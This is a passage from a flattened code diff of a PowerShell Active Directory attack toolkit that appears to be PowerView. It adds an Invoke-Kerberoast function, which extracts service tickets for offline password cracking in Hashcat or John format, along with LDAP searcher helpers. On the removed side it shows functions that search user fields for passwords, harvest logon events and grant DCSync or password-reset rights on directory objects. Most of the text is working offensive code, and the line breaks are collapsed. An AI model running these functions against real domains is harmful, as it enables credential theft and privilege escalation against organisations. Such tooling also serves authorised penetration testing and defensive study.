Get-Member -MemberType *Property | Select-Object -Property 'Name' - } -} +.PARAMETER ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. -filter Find-UserField { -<# - .SYNOPSIS +.PARAMETER ServerTimeLimit - Searches user object fields for a given word (default *pass*). Default - field being searched is 'description'. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - Taken directly from @obscuresec's post: - http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html +.PARAMETER Tombstone - .PARAMETER SearchTerm +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Term to search for, default of "pass". +.PARAMETER OutputFormat - .PARAMETER SearchField +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'Hashcat'. - User field to search, default of "description". +.PARAMETER Credential - .PARAMETER ADSpath +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.EXAMPLE - .PARAMETER Domain +Invoke-Kerberoast | fl - Domain to search computer fields for, defaults to the current domain. +Kerberoasts all found SPNs for the current domain, outputting to Hashcat format (default). - .PARAMETER DomainController +.EXAMPLE - Domain controller to reflect LDAP queries through. +Invoke-Kerberoast -Domain dev.testlab.local | fl - .PARAMETER PageSize +Kerberoasts all found SPNs for the testlab.local domain, outputting to JTR +format instead of Hashcat. - The PageSize to set for the LDAP searcher object. +.EXAMPLE - .PARAMETER Credential +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce +$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword) +Invoke-Kerberoast -Credential $Cred -Verbose -Domain testlab.local | fl - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +Kerberoasts all found SPNs for the testlab.local domain using alternate credentials. - .EXAMPLE +.OUTPUTS - PS C:\> Find-UserField -SearchField info -SearchTerm backup +PowerView.SPNTicket - Find user accounts with "backup" in the "info" field. +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.SPNTicket')] [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] [String] - $SearchTerm = 'pass', + $Domain, + [ValidateNotNullOrEmpty()] + [Alias('Filter')] [String] - $SearchField = 'description', + $LDAPFilter, + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $ADSpath, + $SearchBase, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $Domain, + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $DomainController, + $SearchScope = 'Subtree', - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200, + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [ValidateSet('John', 'Hashcat')] + [Alias('Format')] + [String] + $OutputFormat = 'Hashcat', [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - - Get-NetUser -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField + + BEGIN { + $UserSearcherArguments = @{ + 'SPN' = $True + 'Properties' = 'samaccountname,distinguishedname,serviceprincipalname' + } + if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity } + Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } } -filter Get-UserEvent { +function Get-PathAcl { <# - .SYNOPSIS +.SYNOPSIS - Dump and parse security events relating to an account logon (ID 4624) - or a TGT request event (ID 4768). Intended to be used and tested on - Windows 2008 Domain Controllers. - Admin Reqd? YES +Enumerates the ACL for a given file path. - Author: @sixdub +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID - .PARAMETER ComputerName +.DESCRIPTION - The computer to get events from. Default: Localhost +Enumerates the ACL for a specified file/folder path, and translates +the access rules for each entry into readable formats. If -Credential is passed, +Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. - .PARAMETER EventType +.PARAMETER Path - Either 'logon', 'tgt', or 'all'. Defaults: 'logon' +Specifies the local or remote path to enumerate the ACLs for. - .PARAMETER DateStart +.PARAMETER Credential - Filter out all events before this date. Default: 5 days +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target path. - .PARAMETER Credential +.EXAMPLE - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +Get-PathAcl "\\SERVER\Share\" - .EXAMPLE +Returns ACLs for the given UNC share. - PS C:\> Get-UserEvent -ComputerName DomainController.testlab.local +.EXAMPLE - .LINK +gci .\test.txt | Get-PathAcl - http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ -#> +.EXAMPLE - Param( - [Parameter(ValueFromPipeline=$True)] - [String] - $ComputerName = $Env:ComputerName, +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred - [String] - [ValidateSet("logon","tgt","all")] - $EventType = "logon", +.INPUTS - [DateTime] - $DateStart = [DateTime]::Today.AddDays(-5), +String + +One of more paths to enumerate ACLs for. + +.OUTPUTS + +PowerView.FileACL + +A custom object with the full path and associated ACL entries. + +.LINK + +https://support.microsoft.com/en-us/kb/305144 +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.FileACL')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('FullName')] + [String[]] + $Path, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - if($EventType.ToLower() -like "logon") { - [Int32[]]$ID = @(4624) - } - elseif($EventType.ToLower() -like "tgt") { - [Int32[]]$ID = @(4768) - } - else { - [Int32[]]$ID = @(4624, 4768) - } - - if($Credential) { - Write-Verbose "Using alternative credentials" - $Arguments = @{ - 'ComputerName' = $ComputerName; - 'Credential' = $Credential; - 'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart}; - 'ErrorAction' = 'SilentlyContinue'; - } - } - else { - $Arguments = @{ - 'ComputerName' = $ComputerName; - 'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart}; - 'ErrorAction' = 'SilentlyContinue'; - } - } + BEGIN { - # grab all events matching our filter for the specified host - Get-WinEvent @Arguments | ForEach-Object { + function Convert-FileRight { + # From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights + [CmdletBinding()] + Param( + [Int] + $FSR + ) - if($ID -contains 4624) { - # first parse and check the logon event type. This could be later adapted and tested for RDP logons (type 10) - if($_.message -match '(?s)(?<=Logon Type:).*?(?=(Impersonation Level:|New Logon:))') { - if($Matches) { - $LogonType = $Matches[0].trim() - $Matches = $Null - } - } - else { - $LogonType = "" + $AccessMask = @{ + [uint32]'0x80000000' = 'GenericRead' + [uint32]'0x40000000' = 'GenericWrite' + [uint32]'0x20000000' = 'GenericExecute' + [uint32]'0x10000000' = 'GenericAll' + [uint32]'0x02000000' = 'MaximumAllowed' + [uint32]'0x01000000' = 'AccessSystemSecurity' + [uint32]'0x00100000' = 'Synchronize' + [uint32]'0x00080000' = 'WriteOwner' + [uint32]'0x00040000' = 'WriteDAC' + [uint32]'0x00020000' = 'ReadControl' + [uint32]'0x00010000' = 'Delete' + [uint32]'0x00000100' = 'WriteAttributes' + [uint32]'0x00000080' = 'ReadAttributes' + [uint32]'0x00000040' = 'DeleteChild' + [uint32]'0x00000020' = 'Execute/Traverse' + [uint32]'0x00000010' = 'WriteExtendedAttributes' + [uint32]'0x00000008' = 'ReadExtendedAttributes' + [uint32]'0x00000004' = 'AppendData/AddSubdirectory' + [uint32]'0x00000002' = 'WriteData/AddFile' + [uint32]'0x00000001' = 'ReadData/ListDirectory' } - # interactive logons or domain logons - if (($LogonType -eq 2) -or ($LogonType -eq 3)) { - try { - # parse and store the account used and the address they came from - if($_.message -match '(?s)(?<=New Logon:).*?(?=Process Information:)') { - if($Matches) { - $UserName = $Matches[0].split("`n")[2].split(":")[1].trim() - $Domain = $Matches[0].split("`n")[3].split(":")[1].trim() - $Matches = $Null - } - } - if($_.message -match '(?s)(?<=Network Information:).*?(?=Source Port:)') { - if($Matches) { - $Address = $Matches[0].split("`n")[2].split(":")[1].trim() - $Matches = $Null - } - } - - # only add if there was account information not for a machine or anonymous logon - if ($UserName -and (-not $UserName.endsWith('$')) -and ($UserName -ne 'ANONYMOUS LOGON')) { - $LogonEventProperties = @{ - 'Domain' = $Domain - 'ComputerName' = $ComputerName - 'Username' = $UserName - 'Address' = $Address - 'ID' = '4624' - 'LogonType' = $LogonType - 'Time' = $_.TimeCreated - } - New-Object -TypeName PSObject -Property $LogonEventProperties - } - } - catch { - Write-Verbose "Error parsing event logs: $_" - } + $SimplePermissions = @{ + [uint32]'0x1f01ff' = 'FullControl' + [uint32]'0x0301bf' = 'Modify' + [uint32]'0x0200a9' = 'ReadAndExecute' + [uint32]'0x02019f' = 'ReadAndWrite' + [uint32]'0x020089' = 'Read' + [uint32]'0x000116' = 'Write' } + + $Permissions = @() + + # get simple permission + $Permissions += $SimplePermissions.Keys | ForEach-Object { + if (($FSR -band $_) -eq $_) { + $SimplePermissions[$_] + $FSR = $FSR -band (-not $_) + } + } + + # get remaining extended permissions + $Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] } + ($Permissions | Where-Object {$_}) -join ',' } - if($ID -contains 4768) { - # the TGT event type + + $ConvertArguments = @{} + if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } + + $MappedComputers = @{} + } + + PROCESS { + ForEach ($TargetPath in $Path) { try { - if($_.message -match '(?s)(?<=Account Information:).*?(?=Service Information:)') { - if($Matches) { - $Username = $Matches[0].split("`n")[1].split(":")[1].trim() - $Domain = $Matches[0].split("`n")[2].split(":")[1].trim() - $Matches = $Null + if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $HostComputer = (New-Object System.Uri($TargetPath)).Host + if (-not $MappedComputers[$HostComputer]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential + $MappedComputers[$HostComputer] = $True } } - if($_.message -match '(?s)(?<=Network Information:).*?(?=Additional Information:)') { - if($Matches) { - $Address = $Matches[0].split("`n")[1].split(":")[-1].trim() - $Matches = $Null - } - } + $ACL = Get-Acl -Path $TargetPath - $LogonEventProperties = @{ - 'Domain' = $Domain - 'ComputerName' = $ComputerName - 'Username' = $UserName - 'Address' = $Address - 'ID' = '4768' - 'LogonType' = '' - 'Time' = $_.TimeCreated - } + $ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object { + $SID = $_.IdentityReference.Value + $Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments - New-Object -TypeName PSObject -Property $LogonEventProperties + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'Path' $TargetPath + $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__) + $Out | Add-Member Noteproperty 'IdentityReference' $Name + $Out | Add-Member Noteproperty 'IdentitySID' $SID + $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType + $Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL') + $Out + } } catch { - Write-Verbose "Error parsing event logs: $_" + Write-Verbose "[Get-PathAcl] error: $_" } } } + + END { + # remove the IPC$ mappings + $MappedComputers.Keys | Remove-RemoteConnection + } } -function Get-ObjectAcl { +function Convert-LDAPProperty { <# - .SYNOPSIS - Returns the ACLs associated with a specific active directory object. - - Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. - - .PARAMETER SamAccountName - - Object name to filter for. - - .PARAMETER Name - - Object name to filter for. - - .PARAMETER DistinguishedName - - Object distinguished name to filter for. - - .PARAMETER ResolveGUIDs - - Switch. Resolve GUIDs to their display names. +.SYNOPSIS - .PARAMETER Filter +Helper that converts specific LDAP property result fields and outputs +a custom psobject. - A customized ldap filter string to use, e.g. "(description=*admin*)" - - .PARAMETER ADSpath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.DESCRIPTION - .PARAMETER ADSprefix +Converts a set of raw LDAP properties results from ADSI/LDAP searches +into a proper PSObject. Used by several of the Get-Domain* function. - Prefix to set for the searcher (like "CN=Sites,CN=Configuration") +.PARAMETER Properties - .PARAMETER RightsFilter +Properties object to extract out LDAP fields for display. - Only return results with the associated rights, "All", "ResetPassword","WriteMembers" +.OUTPUTS - .PARAMETER Domain +System.Management.Automation.PSCustomObject - The domain to use for the query, defaults to the current domain. - - .PARAMETER DomainController - - Domain controller to reflect LDAP queries through. - - .PARAMETER PageSize - - The PageSize to set for the LDAP searcher object. - - .EXAMPLE - - PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local - - Get the ACLs for the matt.admin user in the testlab.local domain - - .EXAMPLE - - PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local -ResolveGUIDs - - Get the ACLs for the matt.admin user in the testlab.local domain and - resolve relevant GUIDs to their display names. - - .EXAMPLE - - PS C:\> Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs - - Enumerate the ACL permissions for all OUs in the domain. +A custom PSObject with LDAP hashtable properties translated. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] [CmdletBinding()] - Param ( - [Parameter(ValueFromPipelineByPropertyName=$True)] - [String] - $SamAccountName, - - [Parameter(ValueFromPipelineByPropertyName=$True)] - [String] - $Name = "*", - - [Parameter(ValueFromPipelineByPropertyName=$True)] - [String] - $DistinguishedName = "*", - - [Switch] - $ResolveGUIDs, - - [String] - $Filter, - - [String] - $ADSpath, - - [String] - $ADSprefix, - - [String] - [ValidateSet("All","ResetPassword","WriteMembers")] - $RightsFilter, - - [String] - $Domain, - - [String] - $DomainController, - - [ValidateRange(1,10000)] - [Int] - $PageSize = 200 + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + $Properties ) - begin { - $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -ADSprefix $ADSprefix -PageSize $PageSize - - # get a GUID -> name mapping - if($ResolveGUIDs) { - $GUIDs = Get-GUIDMap -Domain $Domain -DomainController $DomainController -PageSize $PageSize - } - } - - process { - - if ($Searcher) { + $ObjectProperties = @{} - if($SamAccountName) { - $Searcher.filter="(&(samaccountname=$SamAccountName)(name=$Name)(distinguishedname=$DistinguishedName)$Filter)" + $Properties.PropertyNames | ForEach-Object { + if ($_ -ne 'adspath') { + if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { + # convert all listed sids (i.e. if multiple are listed in sidHistory) + $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value } } - else { - $Searcher.filter="(&(name=$Name)(distinguishedname=$DistinguishedName)$Filter)" + elseif ($_ -eq 'grouptype') { + $ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum } - - try { - $Results = $Searcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - $Object = [adsi]($_.path) - - if($Object.distinguishedname) { - $Access = $Object.PsBase.ObjectSecurity.access - $Access | ForEach-Object { - $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] - - if($Object.objectsid[0]){ - $S = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value - } - else { - $S = $Null - } - - $_ | Add-Member NoteProperty 'ObjectSID' $S - $_ - } - } - } | ForEach-Object { - if($RightsFilter) { - $GuidFilter = Switch ($RightsFilter) { - "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" } - "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" } - Default { "00000000-0000-0000-0000-000000000000"} - } - if($_.ObjectType -eq $GuidFilter) { $_ } - } - else { - $_ - } - } | ForEach-Object { - if($GUIDs) { - # if we're resolving GUIDs, map them them to the resolved hash table - $AclProperties = @{} - $_.psobject.properties | ForEach-Object { - if( ($_.Name -eq 'ObjectType') -or ($_.Name -eq 'InheritedObjectType') ) { - try { - $AclProperties[$_.Name] = $GUIDS[$_.Value.toString()] - } - catch { - $AclProperties[$_.Name] = $_.Value - } - } - else { - $AclProperties[$_.Name] = $_.Value - } - } - New-Object -TypeName PSObject -Property $AclProperties - } - else { $_ } + elseif ($_ -eq 'samaccounttype') { + $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum + } + elseif ($_ -eq 'objectguid') { + # convert the GUID to a string + $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid + } + elseif ($_ -eq 'useraccountcontrol') { + $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum + } + elseif ($_ -eq 'ntsecuritydescriptor') { + # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 + $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 + if ($Descriptor.Owner) { + $ObjectProperties['Owner'] = $Descriptor.Owner + } + if ($Descriptor.Group) { + $ObjectProperties['Group'] = $Descriptor.Group + } + if ($Descriptor.DiscretionaryAcl) { + $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl + } + if ($Descriptor.SystemAcl) { + $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl } - $Results.dispose() - $Searcher.dispose() } - catch { - Write-Warning $_ + elseif ($_ -eq 'accountexpires') { + if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) { + $ObjectProperties[$_] = "NEVER" + } + else { + $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0]) + } + } + elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { + # convert timestamps + if ($Properties[$_][0] -is [System.MarshalByRefObject]) { + # if we have a System.__ComObject + $Temp = $Properties[$_][0] + [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) + } + else { + # otherwise just a string + $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) + } + } + elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) { + # try to convert misc com objects + $Prop = $Properties[$_] + try { + $Temp = $Prop[$_][0] + [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) + } + catch { + Write-Verbose "[Convert-LDAPProperty] error: $_" + $ObjectProperties[$_] = $Prop[$_] + } + } + elseif ($Properties[$_].count -eq 1) { + $ObjectProperties[$_] = $Properties[$_][0] + } + else { + $ObjectProperties[$_] = $Properties[$_] } } } + try { + New-Object -TypeName PSObject -Property $ObjectProperties + } + catch { + Write-Warning "[Convert-LDAPProperty] Error parsing LDAP properties : $_" + } } -function Add-ObjectAcl { +######################################################## +# +# Domain info functions below. +# +######################################################## + +function Get-DomainSearcher { <# - .SYNOPSIS +.SYNOPSIS - Adds an ACL for a specific active directory object. - - AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3) - https://adsecurity.org/?p=1906 +Helper used by various functions that builds a custom AD searcher object. - ACE setting method adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain - 'ResetPassword' doesn't need to know the user's current password - 'WriteMembers' allows for the modification of group membership +.DESCRIPTION - .PARAMETER TargetSamAccountName +Takes a given domain and a number of customizations and returns a +System.DirectoryServices.DirectorySearcher object. This function is used +heavily by other LDAP/ADSI searcher functions (Verb-Domain*). - Target object name to filter for. +.PARAMETER Domain - .PARAMETER TargetName +Specifies the domain to use for the query, defaults to the current domain. - Target object name to filter for. +.PARAMETER LDAPFilter - .PARAMETER TargetDistinguishedName +Specifies an LDAP query string that is used to filter Active Directory objects. - Target object distinguished name to filter for. +.PARAMETER Properties - .PARAMETER TargetFilter +Specifies the properties of the output object to retrieve from the server. - A customized ldap filter string to use to find a target, e.g. "(description=*admin*)" +.PARAMETER SearchBase - .PARAMETER TargetADSpath +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - The LDAP source for the target, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +.PARAMETER SearchBasePrefix - .PARAMETER TargetADSprefix +Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration"). - Prefix to set for the target searcher (like "CN=Sites,CN=Configuration") +.PARAMETER Server - .PARAMETER PrincipalSID +Specifies an Active Directory server (domain controller) to bind to for the search. - The SID of the principal object to add for access. +.PARAMETER SearchScope - .PARAMETER PrincipalName +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - The name of the principal object to add for access. +.PARAMETER ResultPageSize - .PARAMETER PrincipalSamAccountName +Specifies the PageSize to set for the LDAP searcher object. - The samAccountName of the principal object to add for access. +.PARAMETER ResultPageSize - .PARAMETER Rights +Specifies the PageSize to set for the LDAP searcher object. - Rights to add for the principal, "All","ResetPassword","WriteMembers","DCSync" +.PARAMETER ServerTimeLimit - .PARAMETER Domain +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - The domain to use for the target query, defaults to the current domain. +.PARAMETER SecurityMasks - .PARAMETER DomainController +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. - Domain controller to reflect LDAP queries through. +.PARAMETER Tombstone - .PARAMETER PageSize +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - The PageSize to set for the LDAP searcher object. +.PARAMETER Credential - .EXAMPLE +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john +.EXAMPLE - Grants 'john' all full access rights to the 'matt' account. +Get-DomainSearcher -Domain testlab.local - .EXAMPLE +Return a searcher for all objects in testlab.local. - Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john -Rights ResetPassword +.EXAMPLE - Grants 'john' the right to reset the password for the 'matt' account. +Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon' - .LINK +Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties. - https://adsecurity.org/?p=1906 - - https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell -#> +.EXAMPLE - [CmdletBinding()] - Param ( - [String] - $TargetSamAccountName, +Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" - [String] - $TargetName = "*", +Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU). - [Alias('DN')] - [String] - $TargetDistinguishedName = "*", +.OUTPUTS - [String] - $TargetFilter, +System.DirectoryServices.DirectorySearcher +#> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.DirectorySearcher')] + [CmdletBinding()] + Param( + [Parameter(ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] [String] - $TargetADSpath, + $Domain, + [ValidateNotNullOrEmpty()] + [Alias('Filter')] [String] - $TargetADSprefix, + $LDAPFilter, - [String] - [ValidatePattern('^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+')] - $PrincipalSID, + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $PrincipalName, + $SearchBase, + [ValidateNotNullOrEmpty()] [String] - $PrincipalSamAccountName, + $SearchBasePrefix, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - [ValidateSet("All","ResetPassword","WriteMembers","DCSync")] - $Rights = "All", + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $RightsGUID, + $SearchScope = 'Subtree', - [String] - $Domain, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit = 120, + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] [String] - $DomainController, + $SecurityMasks, - [ValidateRange(1,10000)] - [Int] - $PageSize = 200 + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - begin { - $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $TargetADSpath -ADSprefix $TargetADSprefix -PageSize $PageSize + PROCESS { + if ($PSBoundParameters['Domain']) { + $TargetDomain = $Domain - if($PrincipalSID) { - $ResolvedPrincipalSID = $PrincipalSID + if ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) { + # see if we can grab the user DNS logon domain from environment variables + $UserDomain = $ENV:USERDNSDOMAIN + if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $UserDomain) { + $BindServer = "$($ENV:LOGONSERVER -replace '\\','').$UserDomain" + } + } } - else { - $Principal = Get-ADObject -Domain $Domain -DomainController $DomainController -Name $PrincipalName -SamAccountName $PrincipalSamAccountName -PageSize $PageSize - - if(!$Principal) { - throw "Error resolving principal" + elseif ($PSBoundParameters['Credential']) { + # if not -Domain is specified, but -Credential is, try to retrieve the current domain name with Get-Domain + $DomainObject = Get-Domain -Credential $Credential + $BindServer = ($DomainObject.PdcRoleOwner).Name + $TargetDomain = $DomainObject.Name + } + elseif ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) { + # see if we can grab the user DNS logon domain from environment variables + $TargetDomain = $ENV:USERDNSDOMAIN + if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $TargetDomain) { + $BindServer = "$($ENV:LOGONSERVER -replace '\\','').$TargetDomain" } - $ResolvedPrincipalSID = $Principal.objectsid } - if(!$ResolvedPrincipalSID) { - throw "Error resolving principal" + else { + # otherwise, resort to Get-Domain to retrieve the current domain object + write-verbose "get-domain" + $DomainObject = Get-Domain + $BindServer = ($DomainObject.PdcRoleOwner).Name + $TargetDomain = $DomainObject.Name } - } - process { + if ($PSBoundParameters['Server']) { + # if there's not a specified server to bind to, try to pull a logon server from ENV variables + $BindServer = $Server + } - if ($Searcher) { + $SearchString = 'LDAP://' - if($TargetSamAccountName) { - $Searcher.filter="(&(samaccountname=$TargetSamAccountName)(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)" + if ($BindServer -and ($BindServer.Trim() -ne '')) { + $SearchString += $BindServer + if ($TargetDomain) { + $SearchString += '/' } - else { - $Searcher.filter="(&(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)" - } - - try { - $Results = $Searcher.FindAll() - $Results | Where-Object {$_} | 